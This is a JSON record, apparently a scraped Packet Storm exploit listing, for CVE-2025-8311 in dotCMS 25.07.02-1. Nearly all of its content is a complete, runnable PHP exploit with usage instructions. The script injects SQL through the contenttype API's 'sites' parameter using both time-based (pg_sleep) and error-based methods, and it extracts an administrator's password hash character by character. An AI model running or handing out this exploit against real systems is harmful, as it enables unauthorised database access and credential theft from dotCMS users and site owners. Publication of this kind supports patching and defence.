{“lastseen”:”2025-12-09T17:44:29″,”description”:”This PHP script represents a sophisticated dual-method SQL Injection exploit targeting dotCMS version 25.07.02-1. The exploit combines time-based blind SQL injection and error-based SQL injection techniques to extract password hashes from the database,…”,”published”:”2025-12-09T00:00:00″,”modified”:”2025-12-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212607″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8311″],”sourceData”:”=============================================================================================================================================\\n | # Title : dotCMS 25.07.02-1 Authenticated Blind SQL Injection (Time-Based) |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.dotcms.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211125\/ \\u0026 \\tCVE-2025-8311\\n \\n [+] Summary : This PHP script represents a sophisticated dual-method SQL Injection exploit targeting DotCMS content management systems. \\n The exploit combines Time-Based Blind SQLi and Error-Based SQLi techniques to extract password hashes from the database, specifically targeting administrator accounts.\\n \\t\\n [+] Usage : * : Save as: exploit.php\\n Run : php exploit.php\\n \\t\\n [+] POC :\\t\\n \\n \\u003c?php\\n \/*\\n PoC by Indoushka\\n *\/\\n \\n \/\/=========================\/\/\\n \/\/ USER CONFIGURATION \/\/\\n \/\/=========================\/\/\\n $HOST = \\”127.0.0.1:8443\\”;\\n $TARGET_ACCOUNT = \\”admin@dotcms.com\\”;\\n $TOKEN = \\”REPLACE_WITH_VALID_JWT\\”; \/\/ \\u003c= \u0623\u062f\u062e\u0644 \u062a\u0648\u0643\u0646 \u0635\u062d\u064a\u062d\\n $SLEEP_TIME = 10; \/\/ seconds\\n \\n \/\/=========================\/\/\\n \/\/ Helper Functions \/\/\\n \/\/=========================\/\/\\n \\n function hexEncode($str){\\n $out = \\”\\”;\\n for($i = 0; $i \\u003c strlen($str); $i++){\\n $out .= sprintf(\\”%%%02x\\”, ord($str[$i]));\\n }\\n return $out;\\n }\\n \\n function send_request($payload=\\”\\”){\\n global $HOST, $TOKEN;\\n \\n $payload = hexEncode($payload);\\n $url = \\”https:\/\/{$HOST}\/api\/v1\/contenttype?filter=LCKwsF\\u0026page=774232\\u0026per_page=517532\\u0026orderby=wDdAmr\\u0026direction=DESC\\u0026type=DOTASSET\\u0026host=BBadoI\\u0026sites=PoC{$payload}\\”;\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_HTTPHEADER =\\u003e [\\n \\”Accept: *\/*\\”,\\n \\”Authorization: Bearer {$TOKEN}\\”,\\n \\”User-Agent: Mozilla\/5.0\\”\\n ],\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 300\\n ]);\\n \\n $start = microtime(true);\\n $resp = curl_exec($ch);\\n $end = microtime(true);\\n $delay = $end – $start;\\n \\n curl_close($ch);\\n return [$resp, $delay];\\n }\\n \\n function send_sqli($q){\\n $query = \\”‘) AND 1=(\\”.$q.\\”) AND (‘A’ LIKE ‘A\\”;\\n return send_request($query);\\n }\\n \\n function test_sqli(){\\n global $SLEEP_TIME;\\n \\n echo \\”[!] Checking connection…\\\\n\\”;\\n list($body, $delay) = send_request();\\n if(strpos($body, ‘\\”pagination\\”:{\\”currentPage\\”:’) === false){\\n echo \\”[-] Unexpected response!\\\\n\\”;\\n exit;\\n }\\n echo \\”[+] Connection OK.\\\\n\\”;\\n \\n echo \\”[!] Testing Time-Based SQL Injection…\\\\n\\”;\\n list($body, $delay) = send_sqli(\\”SELECT 1 FROM pg_sleep({$SLEEP_TIME})\\”);\\n if($delay \\u003c $SLEEP_TIME){\\n echo \\”[-] Sleep test failed.\\\\n\\”;\\n \/\/ \u0644\u0627 \u0646\u062e\u0631\u062c \u0645\u0646 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c\u060c \u0642\u062f \u0646\u062c\u0631\u0628 \u0637\u0631\u064a\u0642\u0629 \u0623\u062e\u0631\u0649\\n } else {\\n echo \\”[+] Time-Based SQLi confirmed.\\\\n\\\\n\\”;\\n return true;\\n }\\n \\n echo \\”[!] Testing Error-Based SQL Injection…\\\\n\\”;\\n $result = extract_error_test();\\n if($result){\\n echo \\”[+] Error-Based SQLi confirmed.\\\\n\\\\n\\”;\\n return true;\\n }\\n \\n echo \\”[-] No SQL Injection vulnerability detected.\\\\n\\”;\\n exit;\\n }\\n \\n function extract_error_test(){\\n global $TARGET_ACCOUNT;\\n \\n $payload = \\”‘) AND (SELECT cast((SELECT ‘test’ FROM user_ LIMIT 1) as int)) AND (‘A’=’A\\”;\\n list($resp, $delay) = send_request($payload);\\n \\n if(preg_match(‘\/invalid input syntax for type integer: \\”(.*?)\\”\/’, $resp, $m)){\\n return $m[1];\\n }\\n return false;\\n }\\n \\n function extract_error_full(){\\n global $TARGET_ACCOUNT;\\n \\n echo \\”[!] Attempting Error-Based extraction…\\\\n\\”;\\n \\n $payload = \\”‘) AND (SELECT cast((SELECT password_ FROM user_ WHERE emailaddress='{$TARGET_ACCOUNT}’ LIMIT 1) as int)) AND (‘A’=’A\\”;\\n \\n list($resp, $delay) = send_request($payload);\\n \\n \/\/ \u0627\u0644\u0627\u0644\u062a\u0642\u0627\u0637 \u0645\u0646 \u0631\u0633\u0627\u0644\u0629 \u0627\u0644\u062e\u0637\u0623\\n if(preg_match(‘\/invalid input syntax for type integer: \\”(.*?)\\”\/’, $resp, $m)){\\n return $m[1];\\n }\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0646\u0645\u0637 \u0622\u062e\u0631 \u0644\u0631\u0633\u0627\u0644\u0629 \u0627\u0644\u062e\u0637\u0623\\n if(preg_match(‘\/ERROR: (.*?) at character\/’, $resp, $m)){\\n return $m[1];\\n }\\n \\n return false;\\n }\\n \\n function retrieve_data_time_based($template, $charset){\\n global $SLEEP_TIME, $TARGET_ACCOUNT;\\n \\n $charset = \\”:\\” . str_replace(\\”:\\”,\\”\\”,$charset);\\n $output = \\”\\”;\\n $index = 1;\\n \\n while(true){\\n $found = false;\\n foreach(str_split($charset) as $c){\\n $q = str_replace([\\”[_INDEX_PLACEHOLDER_]\\”,\\”[_ASCII_PLACEHOLDER_]\\”],\\n [$index, ord($c)],\\n $template);\\n \\n list($body, $delay) = send_sqli($q);\\n \\n if($delay \\u003e= intval($SLEEP_TIME\/2)){\\n echo \\”[+] Found char at position {$index}: {$c}\\\\n\\”;\\n $output .= $c;\\n $index++;\\n $found = true;\\n break;\\n }\\n }\\n if(!$found){ break; }\\n }\\n return $output;\\n }\\n \\n function retrieve_data_error_based($charset){\\n global $TARGET_ACCOUNT;\\n \\n $charset = \\”:\\” . str_replace(\\”:\\”,\\”\\”,$charset);\\n $output = \\”\\”;\\n $index = 1;\\n \\n while(true){\\n $found = false;\\n foreach(str_split($charset) as $c){\\n \/\/ \u0628\u0646\u0627\u0621 \u0627\u0633\u062a\u0639\u0644\u0627\u0645 Error-Based\\n $payload = \\”‘) AND (SELECT cast((SELECT substring(password_ from {$index} for 1) FROM user_ WHERE emailaddress='{$TARGET_ACCOUNT}’ LIMIT 1) as int)) AND (‘A’=’A\\”;\\n \\n list($resp, $delay) = send_request($payload);\\n \\n if(preg_match(‘\/invalid input syntax for type integer: \\”(‘.$c.’)\\”\/’, $resp, $m)){\\n echo \\”[+] Found char at position {$index}: {$c}\\\\n\\”;\\n $output .= $c;\\n $index++;\\n $found = true;\\n break;\\n }\\n }\\n if(!$found){ break; }\\n }\\n return $output;\\n }\\n \\n \/\/=========================\/\/\\n \/\/ MAIN \/\/\\n \/\/=========================\/\/\\n \\n echo \\”========================================\\\\n\\”;\\n echo \\” DotCMS SQL Injection Exploit \\\\n\\”;\\n echo \\” Combined Time \\u0026 Error Based \\\\n\\”;\\n echo \\”========================================\\\\n\\\\n\\”;\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629\\n if(!test_sqli()){\\n exit;\\n }\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0633\u0631\u064a\u0639 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Error-Based\\n echo \\”[!] Trying Error-Based extraction first (faster)…\\\\n\\”;\\n $hash_error = extract_error_full();\\n \\n if($hash_error){\\n echo \\”\\\\n[\u2713] SUCCESS: Hash extracted via Error-Based SQLi\\\\n\\”;\\n echo \\”[+] HASH for {$TARGET_ACCOUNT}: {$hash_error}\\\\n\\”;\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u062d\u0629 \u0627\u0644\u0647\u0627\u0634 (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n if(strlen($hash_error) \\u003e= 32 \\u0026\\u0026 preg_match(‘\/^[a-f0-9$.\\\\\/]+$\/i’, $hash_error)){\\n echo \\”[\u2713] Hash appears valid (length: \\” . strlen($hash_error) . \\” chars)\\\\n\\”;\\n }\\n } else {\\n echo \\”[-] Error-Based extraction failed, falling back to Time-Based…\\\\n\\\\n\\”;\\n \\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0632\u0645\u0646\u064a\u0629 \u0643\u062d\u0644 \u0627\u062d\u062a\u064a\u0627\u0637\u064a\\n $template =\\n \\”SELECT (CASE WHEN (substring(password_ from [_INDEX_PLACEHOLDER_] for 1)=chr([_ASCII_PLACEHOLDER_])) \\”.\\n \\”THEN (SELECT 1 FROM pg_sleep(\\”.intval($SLEEP_TIME\/2).\\”) WHERE emailaddress = ‘{$TARGET_ACCOUNT}’) \\”.\\n \\”ELSE 1 END) FROM user_ WHERE emailaddress = ‘{$TARGET_ACCOUNT}’\\”;\\n \\n $chars = \\”abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$.\/:\\”;\\n \\n echo \\”[!] Starting Time-Based extraction (slower)…\\\\n\\”;\\n echo \\”[!] This may take several minutes…\\\\n\\”;\\n \\n $pass = retrieve_data_time_based($template, $chars);\\n \\n if(!empty($pass)){\\n echo \\”\\\\n[\u2713] SUCCESS: Hash extracted via Time-Based SQLi\\\\n\\”;\\n echo \\”[+] HASH for {$TARGET_ACCOUNT}: {$pass}\\\\n\\”;\\n } else {\\n echo \\”\\\\n[-] FAILED: Could not extract hash using any method.\\\\n\\”;\\n echo \\” Possible reasons:\\\\n\\”;\\n echo \\” 1. Account does not exist\\\\n\\”;\\n echo \\” 2. Different database structure\\\\n\\”;\\n echo \\” 3. Additional security measures\\\\n\\”;\\n }\\n }\\n \\n echo \\”\\\\n========================================\\\\n\\”;\\n echo \\” END OF EXPLOIT \\\\n\\”;\\n echo \\”========================================\\\\n\\”;\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212607″,”cvss”:{“score”:9.4,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212607\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-09T17:44:29″,”description”:”This PHP script represents a sophisticated dual-method SQL Injection exploit targeting dotCMS version 25.07.02-1. The exploit combines time-based blind SQL injection and error-based SQL injection…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-29728","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n